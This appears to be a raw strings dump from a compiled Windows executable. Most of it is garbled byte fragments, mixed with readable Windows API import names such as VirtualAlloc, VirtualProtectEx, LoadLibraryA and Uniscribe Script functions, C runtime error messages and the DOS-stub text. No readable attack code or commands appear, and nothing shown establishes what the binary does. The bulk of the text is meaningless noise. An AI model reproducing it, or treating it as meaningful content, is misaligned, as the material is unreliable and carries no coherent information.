jwhjMM jw&Qj$$c] j<XdjuuD $=k&<. &k3mdI KERNEL32.dll {'#-$ KI 'K!"Iay k-jj+$ Kjjs$$ (.| Km k)MM$;"+ KN=+cML KP62xs Kth>}i kUUUtUMm[MM KX3@b_V KY )hX ky$$UPU L]5&V1B L$$ BN$$ LCMapStringA LCMapStringW lD3%`F l I Ut,n l$$$/LZ /L;N+Y LoadLibraryA Lo@XMM LX$$G gG lXoF{K M2oXMUa M6<MGGA _m%7dl m@|;7U |/MB&M$$ M$$bUU[o ($$MDMu mels e s Me_M$; MeMUUA MeoMjj MessageBoxA $mFV$GG Microsoft Visual C++ Runtime Library MjajUU mlOatw MLW4h5 @$$M~M $ $ MM $` +MM1 MM5R$$G MM$BO$$$ MME$$G MMe"MM MM$f$S MMGNMM $MMGuu^ mMiYl' ~MM?jj M^~MjjE MMjmejMM ?MMj{tj MMjV4j$$ MMJwjj MMM3MU MMM/GGSMrUU MM;MM] MM!_MM MMMqMMM #MMM(yMM MMn/$$L MMO$f$ MM|OGG MM+PGG MM?r]T3LM +MMS1\bS MM%S$$5 MMu3MM MMuM$$ MMu;Ru MM.UU9 !$MMw$$$_N MMzZMMq MNaFMuu !mNU^B mQQeM9 MS0Mq0 MultiByteToWideChar MUU%$$ mUU$U$jj MVMGG M$$y_, "Mzx<r{J n1hI(rhnaII n2/>T3 $n4$uD nAtn@$ n e n ,icer - not enough space for arguments - not enough space for environment - not enough space for lowio initialization - not enough space for _onexit/atexit table - not enough space for stdio initialization - not enough space for thread data @npa@no$ n%SS,P NU`x[ n$$$w$ $$$\o$ o2Cqw! OGG8uu o$H$UU _o_J?O o ort s,S ot3anv </<<<O<U<[< $$~OUU$ oVSopcrTeO oW4z;: p1WK!m P 5]z[w p_a-MMM_n $,p$G# pGVGUU Pjju#u$$ p$$*KM2 PrepareTape Program: <program name unknown> P$r@uEJ $PSSSyMM "pS-[T:8 pU/olCc - pure virtual function call ];q`+) $"q$$$' q$>!\$ Q~$$$ !q8$$# $$QbMMj jSSp Q\f&fY qgbuuU qL.T:; QNCN,s QQSVW3 QSUVW3 quu7$$ $Q $U_[Uq7 Q#UX#^ *\R1F4RoG)` r>%3," R3(INwT !R@4ZSSn rB$$$c$$ .rdata RE.`lI .reloc RichB5 @Rr=aT RSS?xU4U RtlUnwind rtobci runtime error Runtime Error! r$Vbo\ R!x\J- $$*$$S ,sAddz ScriptApplyDigitSubstitution ScriptApplyLogicalWidth ScriptBreak ScriptCacheGetHeight ScriptFreeCache ScriptGetCMap ScriptGetFontProperties ScriptGetGlyphABCWidth ScriptIsComplex ScriptItemize ScriptJustify ScriptLayout ScriptPlace ScriptRecordDigitSubstitution ScriptStringCPtoX ScriptStringFree ScriptString_pLogAttr ScriptStringValidate ScriptStringXtoCP ScriptTextOut ScriptXtoCP Seaao u SEASUX SetEnvironmentVariableA SetHandleCount SFjj<P $SI9SS SING error $$SjxK SjYTl` S'$K$$$f sL!b!: $$SM1M }SMMaE #>sn 0J SNSS9S Sn#SUU srD ib[ $$\;SS SS72MMp SSjm\< SSLUU$ $SS;PMM SSrMM# SSSaI'$$ ^SSSSS SSSUuu p SS{tjj SS}USS StiCreateInstanceW STI.dll SUBhU:ZSS @S$$UC$$0UU SunMonTueWedThuFriSat ~S,`V6 |SwSMM5 !sxt'x9 $$SySS @tAoIVC t:Azzm TbGDCN tbJg\I t|c8%Z TerminateProcess !This program cannot be run in DOS mode. !tIc|~ ,^Tjjj Tles n TLOSS error tm,W?@ !tN^PE toJF-R! T[~Qf2 tSS$&$$" tte2th ttrbtf t.;t$$t( tuSSYQ tu;uH= Tuuu~u t/WWUPj ;$$-$$U "U$$~\ U1uU1F u$51;E U6UJUU u8Uu$$ U9sUj1 $Uag@U@u $$UcDU UCjpV\~U UDGG36 UEUUuup$$ U(fU$$ >:u#FV u$$$g0 `uGGjP~ UGoUUl7U UgU$$m UGXtjG U$$H5R U}HU$$r"$$ %uIuUU Uje)jMM $)u$jj ujjEP9 U$-_$j#jX $UL>d6 U#LUjj3 {u LXE U$$Mk<M ) UMM4 uMMxjuu - unable to initialize heap - unable to open console device - unexpected heap error - unexpected multithread lock error >:uNFV UnhandledExceptionFilter `uNnMM UN"USO_S ,uoJS( =uOuSS ]:uP+R user32.dll USP10.dll u$sU$$ \US|U$$ U$~s$XH uT4=b` UtgRrK U tuu$Ap$ $(]$uu| $$-uu$ %U_~U$$ UU$# $ !<UU47 uu^6MM UU7PSS UU{9uu UUAeD$$ uuauuj $UU BM UU"$$c UU$*,c$ UU,C{3d UUcLjj U"~ue1B UU$E$uu UUEUU% UU.!GG u$/uhi UUlJ$$ uuMaM$ UUMiMM U,uMMH uu$ms$ UUm$SS *uuMyM UU^pMMK U{U$r$ UUrHSSL uu-?SS $$u USS u.utJ( UUU%$$ uuUgUUP, u(uujj. UUUmgZy UUUpoUU}8 uu^UU1 uu~UU$j UUU+USS $/$uu$uuW uu]uuz UUu$Vu UUWuu uuxUUN UU*YSS_ uu\$$zMM uuzuu_ UwUMFM *U{x-N UyU*UM,FM uZku$$ $$$V]$ $V$$$$ =>v7qD VC20XC00U vcI>PoU$ vcV 8c3 V#fS8]x vI$$lt VirtualAlloc VirtualFree VirtualProtectEx &VjjwS =V>_>l>}>X?p?w? vlY3m= v$$M\M @Vn@@C VqdQ` e `vSSym Vus<X4 W],}-\ $wC(E_ WideCharToMultiByte $WJsx3 %woHs$$ w\O$$S WriteFile >&W!UK WUU##BH w$uuUkU wUuuVBSS&jj $$wVMM x5UUBn XCMM$@$ x?D ppZL X"fI;! $$x#MMM =xN5fE x@oAoo `.xSSU &Y1\jj Y"~*'9 yA$$$/ ybHtHM Yb^[iv YCw3S] ydN$$9#]Z $-yG?( ynbOi ynpu91 (ys96$ .$$YSdMMt ytJ#0D $#Y$UU =Yx4^{ yy3 5I $$zdj zH%UUM" .zMM]U $z$$O_ zUUWm$W$ z^UUYc zUUz$$